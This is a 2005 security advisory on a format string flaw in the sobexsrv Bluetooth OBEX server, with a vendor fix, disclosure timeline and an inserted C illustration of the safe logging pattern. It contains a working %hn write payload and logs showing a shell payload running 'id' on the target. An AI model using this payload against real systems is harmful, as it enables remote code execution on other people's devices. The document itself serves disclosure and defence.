DMA-2005-1202a.txt

DMA-2005-1202a.txt
Posted Dec 7, 2005
Authored by Kevin Finisterre | Site digitalmunition.com

DMA[2005-1202a] - sobexsrv is susceptible to a format string vulnerability.

tags | advisory
SHA-256 | 76c84e2bf4e5cd57ebbbffba7467689a561d8e8da82bd825409341907cb1c713

DMA[2005-1202a] - 'sobexsrv - Scripting/Secure OBEX Server format string vulnerability'
Author: Kevin Finisterre
Vendor: http://www.mulliner.org/bluetooth/sobexsrv.php
Product: 'sobexsrv'
References: http://www.digitalmunition.com/DMA[2005-1202a].txt
http://www.mulliner.org/bluetooth/sobexsrv-1.0.0_pre3.tar.gz

Description:
The trifinite.blog is a weblog that is maintained by the trifinite.group. Every now and then
you will find new entries there...

Over Turkey Day I noticed a blog entry about a 'not really security related but very useful'
Bluetooth application from the trifinite.group. There were actually two new applications but
one jumped out at me right away. One of the apps needed hardware I did not have so I did not
pay much attention to it, sobexsrv however seemed interesting.

sobexsrv is a Bluetooth OBEX server with Bluetooth Security Mode-2 (application triggered
security) support. It implements OPUSH (put), OPULL (get) and OBEX-FTP (setpath + directory
listing) and therefore is a full OBEX server. sobexsrv was designed with flexibility and
security in mind...

Since I truly think Trifinite is pretty hardcore I almost didn't bother looking for bugs in
this daemon. I pretty much assumed it would be rock solid. I figured if you can whisper at
cars and shit you can certainly write an OBEX server.

Being lazy I assumed that the examples from the man pages were easy enough to get me started
using sobexsrv. I quickly found that the first two man page examples can be used as examples
for triggering a format string issue.

EXAMPLES
Simple setup using the internal mode, logging with syslog(8) and INBOX in /tmp.
sobexsrv -IS -r /tmp

Simple secure setup with chroot and Bluetooth security mode-2.
sobexsrv -s 2 -ISR -l X -r /tmp

In both examples shown above the -S option is used to enable syslog() logging. A format string
issue was located almost immediately in the syslog support for the logging functions. dosyslog()
builds a message from the caller's template and user-supplied arguments (paths, folder names) and
then passes that finished message to syslog() as the format string itself, with no arguments, so
any % directives in user input are interpreted by syslog().

kfinisterre@animosity:~/sobexsrv-1.0.0_pre3$ grep syslog\( . -rin
./src/obexsrv.c:58: void dosyslog(char *m1, void *m2, void *m3)
./src/obexsrv.c:71: syslog(LOG_INFO, log);
...
./src/obexsrv.c:203: dosyslog("folder listing for \"%s\"\n", path, 0);
./src/obexsrv.c:290: if (ret) dosyslog("pulling \"%s\"\n", fullpath, 0);
./src/obexsrv.c:291: else dosyslog("failed pulling \"%s\"\n", fullpath, 0);
./src/obexsrv.c:334: if (ret) dosyslog("pushing \"%s\"\n", fullpath, 0);
./src/obexsrv.c:335: else dosyslog("faild pushing \"%s\"\n", fullpath, 0);
./src/obexsrv.c:356: if (ret) dosyslog("deleting \"%s\"\n", fullpath, 0);
./src/obexsrv.c:357: else dosyslog("failed deleting \"%s\"\n", fullpath, 0);
./src/obexsrv.c:401: dosyslog("created directory \"%s\"\n", fullpath, 0);
./src/obexsrv.c:406: dosyslog("failed to create directory \"%s\"\n", fullpath, 0);
...
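The grep output above shows the shape of the bug: a trusted template plus an untrusted path is rendered into a buffer, and that buffer is then handed to syslog() in the format-string position. The following is an added illustration, not code from sobexsrv or from the advisory's author; the helper names (build_message, emit_unsafe, emit_safe, count_percent) are assumptions, and snprintf() stands in for syslog() so the program can run offline. It places the vulnerable sink beside the fixed form (the message passed as an argument to a literal "%s") and adds a small tripwire a server could apply to untrusted names before logging them.

```c
#include <stdio.h>
#include <string.h>

/* Step 1: trusted template + untrusted argument -> one message buffer.
 * This mirrors the described behaviour of dosyslog(m1, m2, m3): the template
 * is a literal chosen by the program, the argument comes from the remote
 * OBEX client. (Illustrative reconstruction, not the original function.) */
static void build_message(char *dst, size_t n, const char *tmpl, const char *m1)
{
    snprintf(dst, n, tmpl, m1);
}

/* Step 2a, UNSAFE sink: the finished message, which now carries
 * attacker-chosen text, is used as the format string with no arguments.
 * This is the pattern behind syslog(LOG_INFO, log). It is only ever called
 * with directive-free input in this file; with "%x" or "%n" in msg the
 * call would be undefined behaviour. */
#if defined(__GNUC__)
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
#endif
static void emit_unsafe(char *dst, size_t n, const char *msg)
{
    snprintf(dst, n, msg);
}
#if defined(__GNUC__)
#pragma GCC diagnostic pop
#endif

/* Step 2b, SAFE sink: the fix. The message is data, never a format;
 * the equivalent syslog call is syslog(LOG_INFO, "%s", log). */
static void emit_safe(char *dst, size_t n, const char *msg)
{
    snprintf(dst, n, "%s", msg);
}

/* Defensive tripwire: count '%' characters in an untrusted name so a server
 * can reject or flag names that look like format directives before logging.
 * Not a substitute for the "%s" fix, but a cheap detection signal. */
int count_percent(const char *s)
{
    int c = 0;
    for (; *s; s++)
        if (*s == '%')
            c++;
    return c;
}

/* Returns 1 if a hostile folder name passes through the safe sink verbatim.
 * The name is the one the advisory used for its quick verification. */
int safe_sink_preserves_input(void)
{
    char msg[256], out[256];
    const char *hostile = "--AAAABBBB%19$x.%20$x";
    build_message(msg, sizeof msg, "created directory \"%s\"", hostile);
    emit_safe(out, sizeof out, msg);
    return strcmp(out, "created directory \"--AAAABBBB%19$x.%20$x\"") == 0;
}

/* Returns 1 if, for a benign name, both sinks yield the same line. That is
 * why this class of bug goes unnoticed in normal use: the output is
 * identical until a '%' arrives. Constructed sample path. */
int sinks_agree_on_benign_input(void)
{
    char msg[256], a[256], b[256];
    build_message(msg, sizeof msg, "pushing \"%s\"", "/tmp/report.txt");
    emit_unsafe(a, sizeof a, msg);
    emit_safe(b, sizeof b, msg);
    return strcmp(a, b) == 0;
}

int main(void)
{
    printf("safe sink preserves hostile name: %d\n", safe_sink_preserves_input());
    printf("sinks agree on benign name:       %d\n", sinks_agree_on_benign_input());
    printf("percent count in hostile name:    %d\n", count_percent("--AAAABBBB%19$x.%20$x"));
    return 0;
}
```

The one-token fix is the point: every logging helper that forwards a caller-built buffer should do so as `"%s", buf`, and compiling with -Wformat-security (or -Werror=format-security) turns the unsafe pattern into a build-time finding rather than a runtime surprise.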

As an example I used a Windows machine with the Widcomm Bluetooth stack to create a folder named
"--AAAABBBB%19$x.%20$x" on a remote host. The My Bluetooth Places icon provides an OBEX FTP
interface which worked perfectly for a quick verification of the bug.

Nov 24 04:24:40 sobexsrv: [00:0A:3A:54:71:95] connecting...
Nov 24 04:24:40 sobexsrv: [00:0A:3A:54:71:95] connected
Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] folder listing for "/tmp"
Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] created directory "/tmp//---AAAABBBB41414141.42424242"
Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] disconnecting...
Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] disconnected

The host in this example is a PowerPC linux box so keep in mind that the x86 offsets will differ.

This vulnerability is pretty trivial to exploit as shown below. We run the server in debug mode
so that we can see what is going on a little better. Then we exploit it with a scripted ussp-push.

kfinisterre@threat:~$ sobexsrv -ISd -r /home/kfinisterre/
security: mode = 1
REQHINT - add handler for this!
CONNECT start
CONNECT ok, result = 1
CONNECT end
REQDONE
REQHINT - add handler for this!
PUT start
PUT name:
%1997.d%27$hn%76819.d%28$hnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
PUT length: 201
PUT body length: 201
PUT data_type 1
internal_handler: put for
"/home/kfinisterre//%1997.d%27$hn%76819.d%28$hnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
length=201
PUT ok
PUT end
REQDONE
REQHINT - add handler for this!
DISCONNECT start
DISCONNECT end
uid=1000(kfinisterre) gid=1000(kfinisterre)
groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(kfinisterre)

As you can see we were able to deliver a /bin/sh payload and have the daemon run /usr/bin/id for
us.

This is what things look like from the attacker's point of view.

animosity:/home/kfinisterre/ussp-push-0.4# ./sobexsrv.pl
pushing file /tmp/shellcode
name=/tmp/shellcode, size=201
Registered transport

set user data

created new objext
Local device 00:11:B1:07:BE:A7
Remote device 00:0B:0D:63:0B:CC (1)

started a new request
reqdone
Command (00) has now finished, rsp: 20Connected!

Connection return code: 0, id: 0
Connection established
connected to server
Sending file:
%1997.d%27$hn%76819.d%28$hnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,
path: /tmp/shellcode, size: 201
reqdone
Command (02) has now finished, rsp: 20reqdone
Command (01) has now finished, rsp: 20Disconnect done!pushed!!


Workaround:
The author issued the following temporary warning before patching the problem.
"the syslog (-S) function of sobexsrv is vulnerable to a format string attack and therefore should
not be used as of now!"

Fixed versions are available at the following locations.
http://www.mulliner.org/bluetooth/sobexsrv-1.0.0pre4.tar.gz
http://www.mulliner.org/bluetooth/sobexsrv_1.0.0pre4-1_i386.deb
http://www.mulliner.org/nokia770/feed/sobexsrv_1.0.0pre4-1_arm.deb (maemo binary)

Note:
This is honestly not that critical of an issue, however it was a fun bug to exploit and it helps
satisfy my Bluetooth fetish. In reality only a handful of Nokia 770 Tablet PC users and perhaps a
few trifinite.blog users are affected by this issue. Collin made sure this was taken care of very
promptly.

Timeline associated with this bug:
11/03/2005 sobexsrv posted to trifinite.blog by Collin Mulliner
11/23/2005 Turkey Day boredom sets in ... email Collin about the find.
11/25/2005 sobexsrv-1.0.0pre4.tar.gz released
